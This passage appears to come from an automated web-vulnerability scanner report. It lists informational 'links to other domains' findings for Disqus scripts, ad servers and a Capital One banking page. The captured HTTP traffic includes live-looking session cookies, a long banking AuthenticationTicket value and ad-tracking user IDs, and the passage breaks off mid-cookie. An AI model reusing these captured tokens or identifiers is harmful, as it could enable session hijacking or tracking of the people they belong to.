Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://rd.apmebf.com/w/get.media?sid=38735&m=1&tp=5&d=j&t=n&host=media.fastclick.net">here</a>
...[SNIP]...

18.89. http://mediacdn.disqus.com/1311185431/build/system/disqus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311185431/build/system/disqus.js

Issue detail

The page was loaded from a URL containing a query string:

http://mediacdn.disqus.com/1311185431/build/system/disqus.js?

The response contains the following links to other domains:

http://twitter.com/'+c+'
http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&

Request

GET /1311185431/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/
Cookie: __qca=P0-1994503427-1305051999515

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Wed, 20 Jul 2011 19:44:01 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 169823
X-Varnish: 3076561613
Cache-Control: max-age=2519293
Expires: Fri, 19 Aug 2011 20:02:20 GMT
Date: Thu, 21 Jul 2011 16:14:07 GMT
Connection: close

DISQUS.dtpl=function(){var b={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>",getGuestFields:function(a){function b(c){return DISQUS.nodes.get("#"+c+(a?"-"+a:""))}return{name:b("dsq-field-nam
...[SNIP]...
<span class="dsq-mention dsq-tt dsq-mention-twitter"original-title="Expand @'+c+'\'s profile" data-dsq-username="'+c+'" data-dsq-remote="twitter"><a class="twitter-account" href="http://twitter.com/'+c+'" onclick="window.open(\''+("http://twitter.com/intent/user?screen_name="+c)+"', 'Twitter Mention', 'height=420, width=550');return false;\">@"+c+"</a>
...[SNIP]...
</param> <embed src="http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...

18.90. http://mediacdn.disqus.com/1311376479/build/system/disqus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1311376479/build/system/disqus.js

Issue detail

The page was loaded from a URL containing a query string:

http://mediacdn.disqus.com/1311376479/build/system/disqus.js?

The response contains the following links to other domains:

http://twitter.com/'+c+'
http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&

Request

GET /1311376479/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1309224200.12.12.utmcsr=tech.fortune.cnn.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/01/04/the-secs-challenge-in-the-secondary-market/; __utma=113869458.981292312.1305368048.1308922018.1309224200.12

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 22 Jul 2011 23:50:00 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: application/javascript
Vary: Accept-Encoding
Content-Length: 169823
X-Varnish: 3171216261
Cache-Control: max-age=2543603
Expires: Sun, 21 Aug 2011 23:52:30 GMT
Date: Sat, 23 Jul 2011 13:19:07 GMT
Connection: close

DISQUS.dtpl=function(){var b={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>",getGuestFields:function(a){function b(c){return DISQUS.nodes.get("#"+c+(a?"-"+a:""))}return{name:b("dsq-field-nam
...[SNIP]...
<span class="dsq-mention dsq-tt dsq-mention-twitter"original-title="Expand @'+c+'\'s profile" data-dsq-username="'+c+'" data-dsq-remote="twitter"><a class="twitter-account" href="http://twitter.com/'+c+'" onclick="window.open(\''+("http://twitter.com/intent/user?screen_name="+c)+"', 'Twitter Mention', 'height=420, width=550');return false;\">@"+c+"</a>
...[SNIP]...
</param> <embed src="http://www.youtube.com/v/'),a.put(media.location),a.put('&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...

18.91. http://my.seashepherd.org/NetCommunity/Page.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.seashepherd.org
Path:	/NetCommunity/Page.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://my.seashepherd.org/NetCommunity/Page.aspx?pid=183

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /NetCommunity/Page.aspx?pid=183 HTTP/1.1
Host: my.seashepherd.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=208012304.1819747705.1311426916.1311426916.1311426916.1; __utmb=208012304.2.10.1311426916; __utmc=208012304; __utmz=208012304.1311426916.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; ASP.NET_SessionId=fvyp0fbxigboy4j5swvjb5y4; ShoppingCartCookieID=54d88002-2523-4fbd-86c9-a6a32b72f47d; __utma=267483154.1577314129.1311427012.1311427012.1311427012.1; __utmb=267483154.1.10.1311427012; __utmc=267483154; __utmz=267483154.1311427012.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 13:17:35 GMT
Content-Length: 79728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="PageHead"><title>
Se
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

18.92. http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.discovery.com
Path:	/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.discovery.com/RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70?rsi=D08734_70056&rsi=D08734_70065&rsi=D08734_72011&rsi=D08734_72012&index_page

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N5767.dsc.discoveryOX2348/B5649084.3;abr=!ie4;abr=!ie5;sz=160x600;pc=OAS_17183412;ord=516812253?
http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649084.3;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;pc=OAS_17183412;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;ord=516812253?
http://ad.doubleclick.net/adj/N5767.dsc.discoveryOX2348/B5649084.3;abr=!ie;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;pc=OAS_17183412;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;ord=516812253?
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_120x90Button/pg_120x90_red.gif
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_125x125Tile/bloom-tlc-tv-schedule-graphic-125x125c.JPG
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_125x125Tile/green_wine_guide_125x125-pepper.jpg
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_125x125Tile/itunes_th_app_125x125.jpg
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_125x125Tile/th-optiong-print-series-125.jpg
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_160x600Tower/bloom-tlc-tv-schedule-graphic-160x600c.jpg
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_160x600Tower/itunes_th_app_160x600.jpg
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_160x600Tower/treehugger-ad-recycle-my-stuff-160x600.png
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif

Request

GET /RealMedia/ads/adstream_mjx.ads/www.treehugger.com/travel_nature//1683146035@x21,TopLeft,x29,x40,x41,x42,x43,x44,x45,x60,x61,x62,x63,x64,x65,x66,x67,x68,x69,x70?rsi=D08734_70056&rsi=D08734_70065&rsi=D08734_72011&rsi=D08734_72012&index_page HTTP/1.1
Host: oascentral.discovery.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804qykgACEsK; RMFD=011Qkc6iO1022et9|O1022etA|O1022etB; NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660; s_vi=[CS]v1|2715652585160D34-400001A3401A97D7[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 12950
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'TopLeft') {
document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,n
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/2064530375/x21/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>');
}
if (position == 'x29') {
document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649084.3;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;pc=OAS_17183412;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;ord=516812253?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N5767.dsc.discoveryOX2348/B5649084.3;abr=!ie;sz=160x600;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;pc=OAS_17183412;click0=http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/516812253/x29/DCI/6625_CT_Tower_Package_818963660/063011_PGCharm6640_DCI_HlthWellFemaleSelfImp_CT_Tower_3_17183412.html/7263485738303471796b67414345734b?;ord=516812253?">\n');
document.write ('</SCRIPT>
...[SNIP]...
3_17183412.html/7263485738303471796b67414345734b?http://ad.doubleclick.net/jump/N5767.dsc.discoveryOX2348/B5649084.3;abr=!ie4;abr=!ie5;sz=160x600;pc=OAS_17183412;ord=516812253?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N5767.dsc.discoveryOX2348/B5649084.3;abr=!ie4;abr=!ie5;sz=160x600;pc=OAS_17183412;ord=516812253?" BORDER=0 WIDTH=160 HEIGHT=600 ALT="Advertisement"></A>
...[SNIP]...
overy.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/1881225397/x40/DCI/House11_TreeHugger_160x600Tower/itunes_th_app_160x600.jpg/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_160x600Tower/itunes_th_app_160x600.jpg" ALT="" BORDER="0"></A>
...[SNIP]...
ia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/1961170722/x41/DCI/House11_TreeHugger_160x600Tower/bloom-tlc-tv-schedule-graphic-160x600c.jpg/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_160x600Tower/bloom-tlc-tv-schedule-graphic-160x600c.jpg" ALT="" BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/1253467853/x42/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/204837480/x43/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/1467112558/x44/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
Media/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/1719014012/x45/DCI/House11_TreeHugger_160x600Tower/treehugger-ad-recycle-my-stuff-160x600.png/7263485738303471796b67414345734b?x" target=" "><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_160x600Tower/treehugger-ad-recycle-my-stuff-160x600.png" ALT="" BORDER="0"></A>
...[SNIP]...
scentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/93401111/x60/DCI/House11_TreeHugger_120x90Button/pg_120x90_red.gif/7263485738303471796b67414345734b?x" target=" "><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_120x90Button/pg_120x90_red.gif" ALT="" BORDER="0"></A>
...[SNIP]...
covery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/1166587500/x61/DCI/House11_TreeHugger_125x125Tile/itunes_th_app_125x125.jpg/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_125x125Tile/itunes_th_app_125x125.jpg" ALT="" BORDER="0"></A>
...[SNIP]...
alMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/193250640/x62/DCI/House11_TreeHugger_125x125Tile/bloom-tlc-tv-schedule-graphic-125x125c.JPG/7263485738303471796b67414345734b?x" target=" "><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_125x125Tile/bloom-tlc-tv-schedule-graphic-125x125c.JPG" ALT="" BORDER="0"></A>
...[SNIP]...
/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/1473596638/x63/DCI/House11_TreeHugger_125x125Tile/green_wine_guide_125x125-pepper.jpg/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_125x125Tile/green_wine_guide_125x125-pepper.jpg" ALT="" BORDER="0"></A>
...[SNIP]...
ery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/L32/1566216553/x64/DCI/House11_TreeHugger_125x125Tile/th-optiong-print-series-125.jpg/7263485738303471796b67414345734b?x" target=" "><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/DCI/House11_TreeHugger_125x125Tile/th-optiong-print-series-125.jpg" ALT="" BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/1862330139/x65/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/1925351000/x66/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/1598224764/x67/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/748718892/x68/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/885925038/x69/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oascentral.discovery.com/RealMedia/ads/click_lx.ads/www.treehugger.com/travel_nature/1362123459/x70/default/empty.gif/7263485738303471796b67414345734b?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

18.93. https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlinebanking.capitalone.com
Path:	/CapitalOne/OAO/initiation.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://onlinebanking.capitalone.com/CapitalOne/OAO/initiation.aspx?lob=COS&prod=87260IM&prodclass=MMA&itc=CAPITALONE11NZZZDN1QSWZD4&sessionid=FB8DCF93533EFDA4&br=1

The response contains the following links to other domains:

https://seal.verisign.com/splash?form_file=fdf/splash.fdf&lang=en&dn=onlinebanking.capitalone.com
https://switch.atdmt.com/iaction/nyccps_NDB_App_GetStarted

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Fri, 22 Jul 2011 20:33:27 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Header: :=
pics-label: (pics-1.1 http://www.icra.org/pics/vocabularyv03/ l gen true for := r (c 0 l 0 n 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 s0 v 0))
X-AspNet-Version: 1.1.4322
Set-Cookie: InSession=1; path=/; secure
Set-Cookie: TestCookie=OK; expires=Sat, 30-Jul-2011 01:33:27 GMT; path=/; secure
Set-Cookie: AuthenticationTicket=; expires=Tue, 12-Oct-1999 05:00:00 GMT; path=/; secure
Set-Cookie: ASP.NET_SessionId=; path=/; secure
Set-Cookie: AuthenticationTicket=7E9AD15C6E2116D88D183D67C57A26C20820E54D245A0F8AE9840139E5BEF5ACCFCE3D1B7C44B021FEC9F130A4FEE27534778E3F63A7BBB4A0E9B46D87155881050AD326A5E1FEA27E77F2A92F11027DAFACABBA5E303B12279F104B5C246347A77571A7E5BF553780E182CEA81B9EC49B6B23AD7C1ABCC95C0A4DDA53B5CE8688AB3805777F777C4AD1123C339B404D0BCEB68C558A073F427B9AA2788AC4554799BD61BC6FF4A57B9D65FDFCF84BCC79ED17C0750A8769FF23C151F14BF9A99B0A1BBF7B7FCD6355DF8BFDE5D745DBFD0649E7F304781D462B7921; path=/
Vary: Accept-Encoding
Content-Length: 35933

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title id="HTMLTITLE">Capital One Online Banking | Getting Started</ti
...[SNIP]...
<noscript><iframe src="https://switch.atdmt.com/iaction/nyccps_NDB_App_GetStarted" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<BR>
                                           <a id="LNKVERISIGN" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&lang=en&dn=onlinebanking.capitalone.com" target="_blank"><img id="IMGVERISIGN" class="screenOnly" src="../Themes/TopTabMenu/Images/verisign_logo.gif" alt="" border="0" />
...[SNIP]...

18.94. http://pixel.everesttech.net/2368/gr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.everesttech.net
Path:	/2368/gr

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.everesttech.net/2368/gr?url=http%3a//www.everestjs.net/static/ad_if_c.html%23gck%3d__EFGCK__%26efck%3d__EFGSURFER__%26url%3dhttp%3a//tag.admeld.com&ev_gb=0&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=566&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://www.everestjs.net/static/ad_if_c.html

Request

Response

18.95. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1311860925&custom_user_segments=%2C11265%2C50185%2C32345%2C48153%2C6171%2C48669%2C7713%2C48674%2C48675%2C26671%2C1073%2C32180%2C48190%2C32326%2C45639%2C45640%2C45641%2C48203%2C48205%2C59481%2C32350%2C45677%2C30833%2C45683%2C1150%2C9855%2C13450%2C45708%2C45714%2C30364%2C30878%2C49317%2C47281%2C40626%2C60596%2C60600%2C30915%2C55492%2C55670%2C199%2C34505%2C34507%2C34509%2C2083%2C50398%2C56551%2C32503%2C32515%2C45837%2C45842%2C57626%2C12577%2C12579%2C14125%2C44336%2C44340%2C22328%2C50500%2C55693%2C22869%2C14128%2C44390%2C40809%2C14055%2C59247%2C59250%2C29899%2C55680%2C55682%2C49027%2C22922%2C22924%2C41869%2C23954%2C55701%2C18842%2C59294%2C43937%2C32164%2C32165%2C59306%2C32172%2C49076%2C1097%2C32190%2C45643%2C48070%2C55752%2C55754%2C48080%2C22484%2C48088%2C48090%2C48091%2C48092%2C11743%2C44513%2C39397%2C48617%2C48618%2C48620%2C36845%2C56817%2C68088%2C11262%2C67583

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=09035c0c-59c0-487e-ac6a-85a606e2b1c1; exchange_uid=eyIyIjogWyIzNDIwNDE1MjQ1MjAwNjMzMDg1IiwgNzM0MzA4XSwgIjQiOiBbIkNBRVNFQkw2UWZGZE9aQkZ1d0t0cjRtWGN5YyIsIDczNDMzN119; subID="{}"; impressions="{\"652209\": [1307361360+ \"673736260435966816\"+ 29712+ 11561+ 12332]+ \"578963\": [1308705142+ \"5582cf52-010b-3f00-a0c2-ce399ddcd498\"+ 3241+ 40464+ 42]+ \"678220\": [1307963585+ \"96c74834-d3fd-3b96-9551-b00ee21c6eae\"+ 7025+ 59171+ 7407]+ \"702131\": [1309234818+ \"6711271471285110655\"+ 160677+ 103577+ 2]+ \"578969\": [1306540018+ \"6628743465197727397\"+ 186+ 789+ 1950]+ \"536719\": [1306540056+ \"4971361720444723341\"+ 29712+ 11561+ 1950]+ \"646575\": [1306535330+ \"2511253520107290994\"+ 174+ 657+ 1950]+ \"318445\": [1310644253+ \"Th7YGwAJYV4K7GUs0lMuuA==\"+ 129398+ 75015+ 1685]+ \"691082\": [1308190340+ \"7771034340879608580\"+ 169+ 657+ 2]+ \"609953\": [1310644252+ \"Th7YGgAJ5ZgK7GTR1UIraQ==\"+ 129395+ 75015+ 1685]+ \"678238\": [1307361357+ \"4303623916581927836\"+ 4478+ 2534+ 12332]+ \"609791\": [1311125511+ \"5865143651491006967\"+ 160196+ 103546+ 12332]+ \"678237\": [1311125559+ \"567377526065337370\"+ 4483+ 2534+ 12332]+ \"546680\": [1306514382+ \"8130604638783651597\"+ 174+ 657+ 1950]+ \"726658\": [1311125612+ 